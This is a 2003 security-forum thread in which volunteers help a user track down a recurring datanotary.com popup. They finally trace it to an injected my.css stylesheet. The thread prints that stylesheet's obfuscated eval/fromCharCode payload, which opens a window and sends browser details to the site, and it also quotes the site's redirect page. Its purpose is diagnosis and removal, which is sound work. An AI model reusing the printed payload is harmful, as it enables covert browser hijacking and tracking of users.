datanotary - browser hijack

Discussion in 'malware problems & news' started by vertergre, Jun 10, 2003.

Thread Status:
Not open for further replies.
  1. vertergre

    vertergre Registered Member

    Joined:
    Jun 10, 2003
    Posts:
    6
    Hi.

    Hope someone can help with this. Periodically a new window will pop up when I right-click or left-click a link. The new window has the URL hxxp://datanotary.com/gallery/?r=vad&c=undefined&l=undefined&m=undefined. It's always a blank page and nothing else happens. But I think it's slowing me down a little.

    'datanotary' isn't in the registry or in any filename.

    I'm running 98SE and Smart Explorer 6.0 (a front end for the IE 5.5 engine). Smart Explorer has anti-popup built-in, and I never get a popup except this one.

    I've cleaned the cache and cookies, put datanotary.com in the Hosts file pointing to 0.0.0.0, and run Ad-Aware 6, HijackThis, Pest Patrol, SpyBot, The Cleaner, Grisoft's AVG, and have SpywareGuard, SpywareBlaster, and Script Sentry installed, and ran the Trend Micro HouseCall online scan. Nothing found it.

    Web searches have turned up nothing, except for one guy with the same problem. He said the code contained 'ClientCaps'. Maybe that's where it's getting in.

    Anybody know what this is or how to find and remove it?

    I appreciate your help.

    peace
    vertergre


    disabled link
     
  2. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands
    Please go to http://www.tomcoyote.org/hjt/, and download 'Hijack This!'.
    Unzip, doubleclick HijackThis.exe, and hit "Scan".

    When the scan is finished, the "Scan" button will change into a "Save Log" button.
    Press that, save the log as a .txt file, and copy and paste its contents into your next post.

    Most of what it lists will be harmless, so do not fix anything yet.

    Regards,

    Pieter
     
  3. vertergre

    vertergre Registered Member

    Joined:
    Jun 10, 2003
    Posts:
    6
    Hi, Pieter.

    As I said, I've already run HijackThis, and several other virus and trojan scans, including TrendMicro's Housecall online scan. They all came up with nothing.

    But is it still helpful for you to see their logs anyway? If so, I'll post them here.

    For now, here's the log from StartUp List, at the end of this message.

    StartUp Monitor and WinPatrol haven't reported any new startups, and BHO Cop hasn't reported any new BHOs.

    Thanks very much for your generous help.

    peace
    vertergre


    StartupList report, 6/10/03, 10:21:55 pm
    StartupList version: 1.52
    Started from : E:\STARTUP LIST\STARTUPLIST.EXE
    Detected: Windows 98 SE (Win9x 4.10.2222A)
    Detected: Internet Explorer v5.51 SP2 (5.51.4807.2300)
    * Including empty and uninteresting sections
    * Showing rarely important sections
    ==================================================

    Running processes:

    C:\WINDOWS\SYSTEM\KERNEL32.DLL
    C:\WINDOWS\SYSTEM\MSGSRV32.EXE
    C:\WINDOWS\SYSTEM\MPREXE.EXE
    C:\WINDOWS\SYSTEM\mmtask.tsk
    C:\WINDOWS\EXPLORER.EXE
    C:\WINDOWS\TASKMON.EXE
    C:\WINDOWS\SYSTEM\SYSTRAY.EXE
    G:\MOUSE DRIVER\POINT32.EXE
    E:\AVG 6.0\AVGCC32.EXE
    C:\PROGRAM FILES\PESTPATROL\PPMEMCHECK.EXE
    E:\EZ MACROS 5.0\EZMACROS.EXE
    E:\WINPATROL 5.0\WINPATROL.EXE
    C:\WINDOWS\STARTUPMONITOR.EXE
    E:\MAGNIFYING GLASS 2.00\MAGNIFYING GLASS.EXE
    C:\PROGRAM FILES\STOPITNOW\STOPITNOW.EXE
    C:\WINDOWS\SYSTEM\WMIEXE.EXE
    C:\WINDOWS\SYSTEM\RNAAPP.EXE
    C:\WINDOWS\SYSTEM\TAPISRV.EXE
    C:\WINDOWS\INTEGRATOR.EXE
    E:\FREESOLITAIRE 4.0.1\FREESOLITAIRE.EXE
    E:\JBMAIL 3.1\JBMAIL.EXE
    C:\WINDOWS\NOTEPAD.EXE
    C:\WINDOWS\NOTEPAD.EXE
    C:\WINDOWS\SYSTEM\DDHELP.EXE
    E:\DRAMATIC 8.0\DRAMATIC.EXE
    C:\WINDOWS\SYSTEM\SPOOL32.EXE
    E:\SMART EXPLORER 6.0\SMARTEXPLORER.EXE
    C:\WINDOWS\NOTEPAD.EXE
    E:\STARTUP LIST\STARTUPLIST.EXE

    --------------------------------------------------

    Listing of startup folders:

    Shell folders Startup:
    [C:\WINDOWS\Start Menu\Programs\StartUp]
    BHO Cop.lnk = E:\BHO Cop 1.0\BHOCop.exe
    Hare.lnk = E:\Hare 1.5.1\Hare.exe
    SpywareGuard Control Panel.lnk = E:\SpywareGuard 1.1\spywareguardcp.exe
    stopITnow.lnk = C:\Program Files\stopItnow\stopITnow.exe

    User shell folders Startup:
    *Folder not found*

    Shell folders Common Startup:
    [C:\WINDOWS\All Users\Start Menu\Programs\StartUp]
    *No files*

    User shell folders Common Startup:
    *Folder not found*

    User shell folders Alternate Common Startup:
    *Folder not found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run

    ScanRegistry = C:\WINDOWS\scanregw.exe /autorun
    TaskMonitor = C:\WINDOWS\taskmon.exe
    SystemTray = SysTray.Exe
    POINTER = G:\Mouse Driver\point32.exe
    AVG_CC = E:\AVG 6.0\avgcc32.exe /startup
    PPMemCheck = C:\PROGRA~1\PESTPA~1\PPMemCheck.exe
    PestPatrolCL = C:\PROGRA~1\PESTPA~1\PestPatrolCL.exe
    EZ Macros = E:\EZ Macros 5.0\EZMacros.exe /m
    WinPatrol = E:\WINPAT~1.0\WinPatrol.exe
    ScriptSentry = E:\SCRIPT SENTRY 2.7.1\SCRIPTSENTRY.exe /check
    Run StartupMonitor = StartupMonitor.exe

    --------------------------------------------------

    Autorun entries from Registry:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

    *No values found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

    *No values found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

    *No values found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

    *No values found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run

    MagnifyingGlass = E:\MAGNIFYING GLASS 2.00\MAGNIFYING GLASS.EXE /autorun

    --------------------------------------------------

    Autorun entries from Registry:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

    *No values found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

    *Registry key not found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices

    *Registry key not found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

    *Registry key not found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    *No subkeys found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
    *No subkeys found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
    *No subkeys found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
    *No subkeys found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
    *No subkeys found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    *No subkeys found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
    *No subkeys found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
    *Registry key not found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
    *Registry key not found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
    *Registry key not found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run
    *Registry key not found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run
    *Registry key not found*

    --------------------------------------------------

    File association entry for .EXE:
    HKEY_CLASSES_ROOT\exefile\shell\open\command

    (Default) = "%1" %*

    --------------------------------------------------

    File association entry for .COM:
    HKEY_CLASSES_ROOT\comfile\shell\open\command

    (Default) = "%1" %*

    --------------------------------------------------

    File association entry for .BAT:
    HKEY_CLASSES_ROOT\batfile\shell\open\command

    (Default) = "%1" %*

    --------------------------------------------------

    File association entry for .PIF:
    HKEY_CLASSES_ROOT\piffile\shell\open\command

    (Default) = "%1" %*

    --------------------------------------------------

    File association entry for .SCR:
    HKEY_CLASSES_ROOT\scrfile\shell\open\command

    (Default) = "%1" /S

    --------------------------------------------------

    File association entry for .HTA:
    HKEY_CLASSES_ROOT\htafile\shell\open\command

    (Default) = E:\SCRIPT SENTRY 2.7.1\SCRIPTSENTRY.exe "%1" %*

    --------------------------------------------------

    Enumerating Active Setup stub paths:
    HKLM\Software\Microsoft\Active Setup\Installed Components
    (* = disabled by HKCU twin)

    [{22d6f312-b0f6-11d0-94ab-0080c74c7e95}] *
    StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\mplay98.inf,PerUserStub

    [{89820200-ECBD-11cf-8B85-00AA005B4383}] *
    StubPath = C:\WINDOWS\SYSTEM\IE4UINIT.EXE

    [>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS] *
    StubPath = RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP

    --------------------------------------------------

    Enumerating ICQ Agent Autostart apps:
    HKCU\Software\Mirabilis\ICQ\Agent\Apps

    *Registry key not found*

    --------------------------------------------------

    Load/Run keys from C:\WINDOWS\WIN.INI:

    load=
    run=

    --------------------------------------------------

    Shell & screensaver key from C:\WINDOWS\SYSTEM.INI:

    Shell=Explorer.exe
    SCRNSAVE.EXE=
    drivers=mmsystem.dll power.drv

    --------------------------------------------------

    Checking for EXPLORER.EXE instances:

    C:\WINDOWS\Explorer.exe: PRESENT!

    C:\Explorer.exe: not present
    C:\WINDOWS\Explorer\Explorer.exe: not present
    C:\WINDOWS\System\Explorer.exe: not present
    C:\WINDOWS\System32\Explorer.exe: not present
    C:\WINDOWS\Command\Explorer.exe: not present

    --------------------------------------------------

    C:\WINDOWS\WININIT.INI listing:
    (Created 10/6/2003, 21:47:6)

    [rename]
    NUL=C:\WINDOWS\TEMP\$AVGUPD$.489
    NUL=E:\AVG6~1.0\$AVGUPD$.BKP

    --------------------------------------------------

    C:\WINDOWS\WININIT.BAK listing:
    (Created 10/6/2003, 6:41:5:cool:

    [rename]
    NUL=C:\WINDOWS\TEMP\_iu14D2N.tmp

    --------------------------------------------------

    C:\AUTOEXEC.BAT listing:

    *File is empty*

    --------------------------------------------------

    C:\CONFIG.SYS listing:

    *File is empty*

    --------------------------------------------------

    C:\WINDOWS\WINSTART.BAT listing:

    *File not found*

    --------------------------------------------------

    C:\WINDOWS\DOSSTART.BAT listing:

    LH G:\MOUSED~1\MOUSE.EXE

    --------------------------------------------------

    Checking for superhidden extensions:

    .lnk: HIDDEN! (arrow overlay: NO!)
    .pif: HIDDEN! (arrow overlay: yes)
    .exe: not hidden
    .com: not hidden
    .bat: not hidden
    .hta: not hidden
    .scr: not hidden
    .shs: HIDDEN!
    .shb: HIDDEN!
    .vbs: not hidden
    .vbe: not hidden
    .wsh: not hidden
    .scf: HIDDEN! (arrow overlay: NO!)
    .url: HIDDEN! (arrow overlay: yes)
    .js: not hidden
    .jse: not hidden

    --------------------------------------------------

    Verifying REGEDIT.EXE integrity:

    - Regedit.exe found in C:\WINDOWS
    - .reg open command is NOT normal! (E:\SCRIPT SENTRY 2.7.1\SCRIPTSENTRY.exe %1 %*)
    - Company name OK: 'Microsoft Corporation'
    - Original filename OK: 'REGEDIT.EXE'
    - File description: 'Registry Editor'

    Registry check failed!

    --------------------------------------------------

    Enumerating Browser Helper Objects:

    (no name) - E:\MASS DOWNLOADER 2.5.0.340\MDHELPER.DLL - {B930BA63-9E5A-11D3-A288-0000E80E2EDE}
    (no name) - E:\SPYBOT~1.1\SDHELPER.DLL - {53707962-6F74-2D53-2644-206D7942484F}
    (no name) - E:\ACROBAT 5.0\READER\ACTIVEX\ACROIEHELPER.OCX - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}

    --------------------------------------------------

    Enumerating Task Scheduler jobs:

    Tune-up Application Start.job

    --------------------------------------------------

    Enumerating Download Program Files:

    [DirectAnimation Java Classes]
    CODEBASE = file://C:\WINDOWS\dajava.cab
    OSD = C:\WINDOWS\Downloaded Program Files\DirectAnimation Java Classes.osd

    [Microsoft XML Parser for Java]
    CODEBASE = file://C:\WINDOWS\Java\classes\xmldso4.cab
    OSD = C:\WINDOWS\Downloaded Program Files\Microsoft XML Parser for Java.osd

    [Shockwave Flash Object]
    InProcServer32 = C:\WINDOWS\SYSTEM\MACROMED\FLASH\FLASH.OCX
    CODEBASE = http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

    [HouseCall Control]
    InProcServer32 = C:\WINDOWS\DOWNLO~1\XSCAN53.OCX
    CODEBASE = http://a840.g.akamai.net/7/840/537/2003050501/housecall.antivirus.com/housecall/xscan53.cab

    --------------------------------------------------

    Enumerating Winsock LSP files:

    NameSpace #1: C:\WINDOWS\SYSTEM\rnr20.dll
    Protocol #1: C:\WINDOWS\SYSTEM\mswsosp.dll
    Protocol #2: C:\WINDOWS\SYSTEM\msafd.dll
    Protocol #3: C:\WINDOWS\SYSTEM\msafd.dll
    Protocol #4: C:\WINDOWS\SYSTEM\msafd.dll
    Protocol #5: C:\WINDOWS\SYSTEM\rsvpsp.dll
    Protocol #6: C:\WINDOWS\SYSTEM\rsvpsp.dll

    --------------------------------------------------

    Enumerating Win9x VxD services:

    NDIS: ndis.vxd,ndis2sup.vxd
    CONFIGMG: *CONFIGMG
    NTKern: *NTKERN
    VWIN32: *VWIN32
    VFBACKUP: *VFBACKUP
    VCOMM: *VCOMM
    COMBUFF: *COMBUFF
    IFSMGR: *IFSMGR
    IOS: *IOS
    MTRR: *mtrr
    SPOOLER: *SPOOLER
    UDF: *UDF
    VFAT: *VFAT
    VCACHE: *VCACHE
    VCOND: *VCOND
    VCDFSD: *VCDFSD
    VXDLDR: *VXDLDR
    VDEF: *VDEF
    VPICD: *VPICD
    VTD: *VTD
    REBOOT: *REBOOT
    VDMAD: *VDMAD
    VSD: *VSD
    V86MMGR: *V86MMGR
    PAGESWAP: *PAGESWAP
    DOSMGR: *DOSMGR
    VMPOLL: *VMPOLL
    SHELL: *SHELL
    PARITY: *PARITY
    BIOSXLAT: *BIOSXLAT
    VMCPD: *VMCPD
    VTDAPI: *VTDAPI
    PERF: *PERF
    VRTWD: C:\WINDOWS\SYSTEM\vrtwd.386
    VFIXD: C:\WINDOWS\SYSTEM\vfixd.vxd
    VNETBIOS: vnetbios.vxd
    JAVASUP: JAVASUP.VXD

    --------------------------------------------------

    Enumerating ShellServiceObjectDelayLoad items:

    *Registry key not found*

    --------------------------------------------------
    End of report, 13,981 bytes
    Report generated in 0.114 seconds

    Command line options:
    /verbose - to add additional info on each section
    /complete - to include empty sections and unsuspicious data
    /full - to include several rarely-important sections
    /force9x - to include Win9x-only startups even if running on WinNT
    /forcent - to include WinNT-only startups even if running on Win9x
    /forceall - to include all Win9x and WinNT startups, regardless of platform
    /history - to list version history only
     
  4. Dan Perez

    Dan Perez Retired Moderator

    Joined:
    May 18, 2003
    Posts:
    1,495
    Location:
    Sunny San Diego
    When I try to access that link in a text-mode browser I get the following

    >snip<

    HTTP/1.1 200 OK
    Date: Tue, 10 Jun 2003 23:02:55 GMT
    Server: Apache/1.3.27 (Unix) PHP/4.3.1
    X-Powered-By: PHP/4.3.1
    Connection: close
    Content-Type: text/html


       <body STYLE="behavior:url(#default#clientCaps)" ID="oClientCaps" onLoad="red(oClientCaps.cookieEnabled,oClientCaps.userLanguage,oClientCaps.connectionType)">
          <script>
             function red(a,b,c)
             {
                window.top.location.href=window.top.location.href + "&c="+a+"&l="+b+"&m="+c
             }
          </script>
       </body>

    >snip<

    Now I DID notice that there had been a domain (and site!) hijack where traffic was going to a Russian server. A representative article on this can be found at

    http://www.scoop.co.nz/mason/stories/BU0008/S00168.htm

    The host I queried was 66.250.57.82 which is a colo on East Coast (US).

    I tried a look at the Smart Explorer product as I could not get any help doc without loading it. I noticed it has its own right click and doucle click and middle click functions though not along the lines of what you described. Have you tried updating to ver 6.1?
     
  5. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands
    Hi vertergre,

    Could you check in the registry ( Start > Run > regedit) if there is anything suspicious present in this key:
    HKCU\Software\Microsoft\Internet Explorer\MenuExt
    There could be several sub"folders" check these as well.

    Note: make a backup before making manual changes to the registry.

    Regards,

    Pieter
     
  6. vertergre

    vertergre Registered Member

    Joined:
    Jun 10, 2003
    Posts:
    6
    Hi, Dan.

    Thanks much for your insights. Right now it's at the point where I have to look at every single thing.

    Yes, I have Smart Explorer 6.1, but when I tried it I immediately went back to 6.0. Something was problematic, mighta been trivial, don't remember now.

    But it's been almost a year since then, trouble-free with 6.0.

    But you're saying maybe it's moderner and safer, eh?

    I've got the double-click and middle click disabled.
    And the occasional popup happens even when I type in a URL and hit Enter.

    Again, thanks. I'm still working on it. Any further thoughts, I'd appreciate.

    peace
    vertergre
     
  7. vertergre

    vertergre Registered Member

    Joined:
    Jun 10, 2003
    Posts:
    6
    Hi, Pieter.

    Thanks for the tip. I looked where you said in the registry, but there was nothing there except two subkeys for Mass Downloader, which I've used incident-free for a year.

    [It's a great downloader, by the way.]

    Thanks again. Any more thoughts, feel free.

    peace
    vertergre
     
  8. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands
    Hi vertergre,

    This will not really lead to a solution to the mistery, but it might help:

    locate your hosts file (path should be c:\windows\hosts for Win9:cool:
    and add the lines
    127.0.0.1 datanotary.com
    127.0.0.1 www.datanotary.com

    Keep me posted,

    Pieter
     
  9. vertergre

    vertergre Registered Member

    Joined:
    Jun 10, 2003
    Posts:
    6
    Hi, Pieter.

    Done done that one; it's in the Hosts file as
    datanotary.com
    www.datanotary.com
    http://datanotary.com
    The last one is the way it was coded, according to another infectee. The other two are overkill.

    I also put it in the Restricted Sites list.

    And both those actions might be overkill 'cause it always comes up as a blank page and stops. But safer than sorrier, since I don't know what it might be waiting to do next.

    thanks again
    vertergre
     
  10. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands
    The page is very awkward. When I tried going there yesterday from work I got a message from the server that is was blocked due to adult content.
    So I tried from home last night and the address didn't resolve. o_O

    Let's see what your HijackThis log tells us. It does show other things then Startuplist, so it might be helpfull.

    Don't you love a good mistery? :D

    Regards,

    Pieter
     
  11. TonyKlein

    TonyKlein Security Expert

    Joined:
    Feb 9, 2002
    Posts:
    4,351
    Location:
    The Netherlands
    This is from another forum thread:

    Cheers,
     
  12. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands
    Thanks for letting us know Tony.

    I added a few "Enters" to your quote, so it didn't end up 4 screens wide. ;)

    Regards,

    Pieter
     
  13. vertergre

    vertergre Registered Member

    Joined:
    Jun 10, 2003
    Posts:
    6
    Howdy, y'all.

    I just read Pacmenred's solution at the Lavasoft Forum. His my.css file had been given some code which launched the new window. Sure enough, my file contained nearly identical code.

    Whew

    A search for 'my.css trojan' turned up a bunch of articles.

    If anyone's interested, the contents of my file are listed below.
    And if anyone can tell me what that code does, feel free.

    Thanks to you all for your generosity and helpfulness.
    Nice folk.

    peace
    vetegr



    C:\Windows\Java\my.css [line returns inserted to keep width down]

    img{behavior:url(#default#clientCaps);background-color:
    expression(eval(String.fromCharCode(40,116,104,105,115,46,
    97,108,116,61,61,34,83,85,82,70,32,73,78,32,83,84,89,76,
    69,46,46,46,32,84,72,69,32,83,69,88,32,84,82,65,67,75,69,
    82,33,34,41,32,63,32,40,32,40,119,105,110,100,111,119,46,
    111,112,101,110,40,39,104,116,116,112,58,47,47,100,97,116,
    97,110,111,116,97,114,121,46,99,111,109,47,103,97,108,108,
    101,114,121,47,63,114,61,118,97,100,38,99,61,39,43,116,
    104,105,115,46,99,111,111,107,105,101,69,110,97,98,108,
    101,100,43,39,38,108,61,39,43,116,104,105,115,46,117,115,
    101,114,76,97,110,103,117,97,103,101,43,39,38,109,61,39,
    43,116,104,105,115,46,99,111,110,110,101,99,116,105,111,
    110,84,121,112,101,44,39,39,44,39,120,61,53,48,48,48,44,
    116,111,112,61,53,48,48,48,44,121,61,53,48,48,48,44,108,
    101,102,116,61,53,48,48,48,44,104,101,105,103,104,116,61,
    54,48,48,44,119,105,100,116,104,61,56,48,48,44,100,105,
    114,101,99,116,111,114,105,101,115,61,121,101,115,44,116,
    111,111,108,98,97,114,61,121,101,115,44,115,116,97,116,
    117,115,61,121,101,115,44,32,108,111,99,97,116,105,111,
    110,61,121,101,115,44,114,101,115,105,122,97,98,108,101,
    61,121,101,115,44,109,101,110,117,98,97,114,61,121,101,
    115,44,115,99,114,111,108,108,98,97,114,115,61,121,101,
    115,39,41,41,32,63,32,116,104,105,115,46,97,108,116,61,
    34,83,85,82,70,32,73,78,32,83,84,89,76,69,46,46,32,84,72,
    69,32,83,69,88,32,84,82,65,67,75,69,82,33,34,32,58,32,39,
    39,32,41,32,58,32,39,39)))}
     
  14. Saint

    Saint Guest

    Thanks for the info-you guys are top-notch- ;)
    Now that the problem is identified, how can I get this bad boy outta my system?
    I'm kinda new at this and I don't wanna hammer my registry...
    Help?

    Thanx
    Saint
     
  15. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands
    Hi Saint,

    For the time being change the registry value
    HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles]
    "Use My Stylesheet"=dword:00000001

    to Use My Stylesheet"=dword:00000000

    and rename my.css to something harmless like mycss.bak

    If you would also give us your OS, I´m sure Tony can come up with a reg file to restore everything to the default settings.

    Regards,

    Pieter
     
  16. saint

    saint Guest

    Thanks again...
    OS is Windows ME

    saint
     
  17. Saint

    Saint Guest

    Hi guys,
    In reply yo your last reply...my OS is Windows ME

    Thanks
    saint
     
  18. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands
    Hi Saint,

    Is everything working OK after the changes I proposed?
    Because it should be completely disabled this way.
    If you want to restore the default settings for that key just delete all the entries in the right hand pane off the Styles key.

    Manually create a restore point before doing so, just in case.

    Regards

    Pieter
     
  19. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands
Loading...
Thread Status:
Not open for further replies.